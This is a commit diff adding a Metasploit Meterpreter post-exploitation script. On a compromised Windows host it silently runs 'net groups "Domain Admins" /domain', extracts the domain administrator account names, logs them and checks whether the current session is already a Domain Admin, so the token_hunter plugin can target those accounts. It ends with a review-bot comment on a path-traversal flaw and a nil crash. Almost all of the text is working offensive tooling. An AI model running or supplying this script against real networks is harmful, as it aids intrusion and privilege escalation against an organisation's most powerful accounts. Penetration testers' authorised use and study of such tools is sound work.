Script for generating Domain Admin Account list for use in token_hunter plugin
git-svn-id: file:///home/svn/framework3/trunk@9125 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
393f7d6b26
commit
4d0d06b1fb
|
@ -0,0 +1,83 @@
|
|||
#$Id$
|
||||
#Meterpreter script for generating domain admin list to be used with Token Hunter plugin
|
||||
#Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
|
||||
#Verion: 0.1
|
||||
#-------------------------------------------------------------------------------
|
||||
#Options and Option Parsing
|
||||
opts = Rex::Parser::Arguments.new(
|
||||
"-h" => [ false, "Help menu." ]
|
||||
)
|
||||
|
||||
opts.parse(args) { |opt, idx, val|
|
||||
case opt
|
||||
when "-h"
|
||||
print_line "Meterpreter Script for extracting Doamin Admin Account list for use."
|
||||
print_line "in token_hunter plugin and verifies if current account for session is"
|
||||
print_line "is a member of such group."
|
||||
print_line(opts.usage)
|
||||
raise Rex::Script::Completed
|
||||
end
|
||||
}
|
||||
#-------------------------------------------------------------------------------
|
||||
#Set General Variables used in the script
|
||||
@client = client
|
||||
users = ""
|
||||
list = []
|
||||
host = @client.sys.config.sysinfo['Computer']
|
||||
current_user = client.sys.config.getuid.scan(/\S*\\(\S*)/)
|
||||
domain = @client.fs.file.expand_path("%USERDOMAIN%")
|
||||
# Create Filename info to be appended to downloaded files
|
||||
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")+"-"+sprintf("%.5d",rand(100000))
|
||||
# Create a directory for the logs
|
||||
logs = ::File.join(Msf::Config.log_directory, 'domain_admins', host + filenameinfo )
|
||||
# Create the log directory
|
||||
::FileUtils.mkdir_p(logs)
|
||||
#logfile name
|
||||
dest = logs + "/" + host + filenameinfo + ".txt"
|
||||
print_status("found users will be saved to #{dest}")
|
||||
#-------------------------------------------------------------------------------
|
||||
# Function for writing results of other functions to a file
|
||||
def filewrt(file2wrt, data2wrt)
|
||||
output = ::File.open(file2wrt, "a")
|
||||
if data2wrt
|
||||
data2wrt.each_line do |d|
|
||||
output.puts(d)
|
||||
end
|
||||
end
|
||||
output.close
|
||||
end
|
||||
################## MAIN ##################
|
||||
#Run net command to enumerate users and verify that it ran successfully
|
||||
cmd = 'net groups "Domain Admins" /domain'
|
||||
r = @client.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
users << d
|
||||
if d=~/System error/
|
||||
print_error("Could not enumerate Domain Admins!")
|
||||
raise Rex::Script::Completed
|
||||
end
|
||||
end
|
||||
#split output in to lines
|
||||
out_lines = users.split("\n")
|
||||
#Select only those lines that have the usernames
|
||||
a_size = (out_lines.length - 8)
|
||||
domadmins = out_lines.slice(6,a_size)
|
||||
#get only the usernames out of those lines
|
||||
domainadmin_user_list = []
|
||||
domadmins.each do |da|
|
||||
da.scan(/(\w*)\b\s/).each do |acc|
|
||||
domainadmin_user_list << acc.join.strip
|
||||
end
|
||||
end
|
||||
#process accounts found
|
||||
print_status("Accounts Found:")
|
||||
domainadmin_user_list.each do |u|
|
||||
print_status("\t#{domain}\\#{u}")
|
||||
filewrt(dest, "#{domain}\\#{u}")
|
||||
list << u
|
||||
end
|
||||
if list.index(current_user.join)
|
||||
print_status("Current sessions running as Domain Admin!!")
|
||||
else
|
||||
print_error("Current session is not running as Domain Admin")
|
||||
end
|
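Review bot: `host` comes from `@client.sys.config.sysinfo['Computer']`, a value reported by the remote session, and is concatenated unchanged into both the `logs` directory passed to `::FileUtils.mkdir_p` and the `dest` file name. A computer name containing path separators or `..` could therefore place the log outside `Msf::Config.log_directory`. Normalise it once where it is assigned, for example `host = @client.sys.config.sysinfo['Computer'].to_s.gsub(/[^\w-]/, '_')`. Separately, `out_lines.slice(6, a_size)` returns nil when the command output has fewer than eight lines, which can happen for any failure text that does not contain `System error`, and the following `domadmins.each` then raises NoMethodError. A guard such as `domadmins = out_lines.slice(6, a_size) || []` lets the script report an empty list instead of aborting.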